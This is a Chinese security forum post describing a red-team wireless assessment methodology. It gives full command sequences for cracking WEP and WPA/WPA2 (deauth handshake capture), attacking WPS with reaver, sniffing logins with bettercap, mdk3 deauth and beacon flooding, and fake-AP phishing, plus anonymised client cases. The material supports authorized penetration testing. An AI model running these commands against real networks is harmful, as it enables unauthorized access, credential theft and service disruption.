安全矩阵

 找回密码
 立即注册
搜索
查看: 5218|回复: 0

技术分享 | 无线安全(红队服务)

[复制链接]

991

主题

1063

帖子

4315

积分

论坛元老

Rank: 8Rank: 8

积分
4315
发表于 2020-7-18 07:43:01 | 显示全部楼层 |阅读模式
本帖最后由 gclome 于 2020-7-18 07:44 编辑

原文链接:技术分享 | 无线安全(红队服务)

无线安全(红队服务)介绍
无线网络及内网渗透 ,利用“开源安全测试方法手册”(OSSTMM)和“渗透测试执行标准”(PTES)作为无线评估方法的基础,模拟来自真实世界的无线攻防,以提供漏洞和威胁评估您的无线网络及内部网络基础架构

无线安全测试思路
1. 无线网络接入评估
2. portal认证系统渗透测试
3. 内网渗透
4. 案例
5. 参考资料

无线网络接入评估
1. 无线网络接入评估--AP物理定位
android上我们使用一款叫wigle的wifi 扫描工具
https://raw.githubusercontent.com/wiglenet/wigle-wifi-wardriving/master/dist/wiglewifiwardriving-release.apk

导出kml文件,可以用谷歌地球(https://pc.qq.com/detail/0/detail25540.html)打开,标注在地图上的精确位置

2. 无线网络接入评估-WLAN网络发现-AP扫描
kali下使用airodump-ng
  1. ifconfig
  2. airmon-ng start wlan0
  3. airodump-ng wlan0mon
复制代码


这里主要关注各ap信号强度,SSID,station mac地址及ap加密类型信息
3. 无线网络接入评估-加密环境破解
我们首先会下载一个wifi万能钥匙,看看该企业目标wifi有没有分享出来密码的。android手机一般要root,wifi密码查看器,
或者您用的小米手机,直接可以在连接成功之后,分享出来一个二维码,二维码携带ssid和wifi密码明文

wep破解

  1. ifconfig -a 查看所有的网卡
  2. ifconfig wlan0 up 激活无线网卡
  3. airmon-ng start wlan0 设置无线网卡模式
  4. airodump-ng wlan0mon 查看无线网络信息
  5. airodump-ng --ivs -w ice -c 6 wlan0mon 抓包
  6. aireplay-ng -3 -b 00:21:27:63:41:CE -h 00:1F:3C:5F:36:15 wlan0mon ARP request 攻击
  7. aircrack-ng ice*.ivs 开始破解
复制代码

wpa/wpa2字典攻击
  1. ifconfig -a 查看所有的网卡
  2. ifconfig wlan0 up 激活无线网卡
  3. airmon-ng start wlan0 设置无线网卡模式
  4. airodump-ng wlan0mon 查看无线网络信息
  5. airodump-ng -w ice -c 6 wlan0mon 抓包
  6. aireplay-ng -0 1 -a AP 的 mac -c 客户端的 mac wlan0mon 进行 Deauth 攻击获取 handshake
  7. aircrack-ng -w 密码字典 ice*.cap 开始破解
复制代码


wps漏洞利用
  1. ifconfig -a 查看所有的网卡
  2. ifconfig wlan0 up 激活无线网卡
  3. airmon-ng start wlan0 设置无线网卡模式
  4. airodump-ng wlan0mon 查看无线网络信息
  5. wash -i wlan0mon -C 扫描开启了wps的路由器
  6. reaver -i wlan0mon -b mac地址 -vv -K 1
复制代码

4. 无线网络接入评估-无线网络设备安全威胁/脆弱性测试
1.中间人攻击及捕获数据分析
使用bettercap嗅探认证登陆请求 bettercap -I eth0 --proxy -P POST




2.对AC设备进行检查
使用burpsuite查看是否明文传输,是否有外网访问管理地址,端口,服务开放情况,有无漏洞
3.snmp探测
snmpwalk -v 2c -c public x.x.x.x
4.ac设备的ddos能力测试
主要测试ac的web页面防止ddos的能力
使用工具:cc攻击工具/SYN flood攻击工具

5.对AP设备进行DDOS攻击
进行客户端与ap的认证和关联中的各种压力测试,包括DEAUTH和AUTH等攻击
使用工具:mdk3(最新版本是mdk4)
  1. mdk3 mon0 a -a MAC(MAC为你要攻击的目标MAC)
  2. mdk3 wlan0mon d -c 11 攻击指定的频道, 让频道为 11 所有计算机都掉线
  3. mdk3 wlan0mon b -f wifi.txt –t –c 6 –s 80 创建自定义文本里的wifi
  4. mdk3 wlan0mon b -g -c 11 -h 7 创建一大堆乱码wifi
复制代码

5.无线网络接入评估-业务安全评估
1.伪造ap测试
伪造一个和目标ap一样的wifi,然后进行钓鱼攻击,并验证钓鱼机制
使用工具:airbase-ng fakeap mitmap等伪造ap的工具,或者使用wifipineapple-Dwall模块搭建钓鱼认证接入点
2.认证方式测试
鉴于部分认证用户只是通过ip来认证,当一个在线用户被踢下线以后,另一个用同样的ip可以继续访问
测试方法:通过两台笔记本配合测试,插拔网线并进行浏览器浏览
3.绕过认证测试 通过分析网络结构,获取ap等终端信息,利用设备ip地址进行连接,测试是否能正常上网
4.dns穿透测试
对dns的限制进行测试,测试是否能进行dns重定向
测试工具和方法:openvpn,loopcvpn,集成工具wifipineapple-dnsspoof模块

Portal认证系统渗透测试
主要发现AC,AP设备系统的漏洞,WEB系统的漏洞(如xss攻击,认证绕过,从而进行网站的渗透,获得系统的权限,并植入后门




内网漏洞挖掘--测试准备
1.连接测试,端口扫描
扫描网关设备(AC或者AP),以获得其开放端口及系统信息 使用nmap进行扫描,或者goby
2.网络设备弱口令探测
goby进行扫描,或者routescan,特别关注设备弱口令(h3c或者cisco的),常用设备弱口令(https://copyfuture.com/blogs-det ... 4840iara7vwvwdrzm5w
如迪普设备admin/admin-default
3.主机/WEB漏洞挖掘
使用awvs,goby进行内网主机系统的扫描和测试。

案例
1. 某金融行业客户,让我们给他们做wifi的接入点的测试
通过接入网点大厅无线网络xxxx,在不进行实名认证(手机短信认证)的情况下进行探测攻击:
探测到可访问sangfor深信服上网行为管理地址:https://10.11.10.1/login.html?namejpgraphantispam=1048689685#



探测到无线控制器WEB管理地址:https://10.10.16.7:4343/screens/wms/wms.login


探测到其他存活IP及开放端口如下:


安全建议:建议针对用户接入无线网络时,在无线网关设置访问控制策略或者部署防火墙进行访问范围进行限制(做好ACL访问控制),且设备自身关闭不必要的服务端口。
2. 某金融行业客户,让我们给他们做wifi的接入点的测试
接入点是h3c的ap,连上之后需要手机短信认证。
团队成员简单的测试了一下,发现了,手机短信验证码在返回包里。然后存在xss,还有短信轰炸漏洞.
安全建议:portal认证的ap,上线前要做渗透测试,有的还有st2这种漏洞。这种边界系统安全不可忽视

参考资料
https://max.book118.com/html/2020/0618/5101324230002304.shtm无线安全评估服务介绍
http://www.techcan.com.cn/newsview.aspx?newsid=88 金融行业加强无线网络安全(银保监会50号文)广州天畅运营方案
xx集团-安全服务部无线网络安全评估服务白皮书
天巡移动式无线安全评估系统产品白皮书
天巡无线入侵防御系统解决方案V2.0
WiFiPineapple-黑色外置天线版-用户手册-V1.3
另外比较深入的案例,可以在《黑客大揭秘近源渗透测试》最后2节近源渗透测试案例,可以看















回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

小黑屋|安全矩阵

GMT+8, 2024-11-28 03:46 , Processed in 0.018424 second(s), 18 queries .

Powered by Discuz! X4.0

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表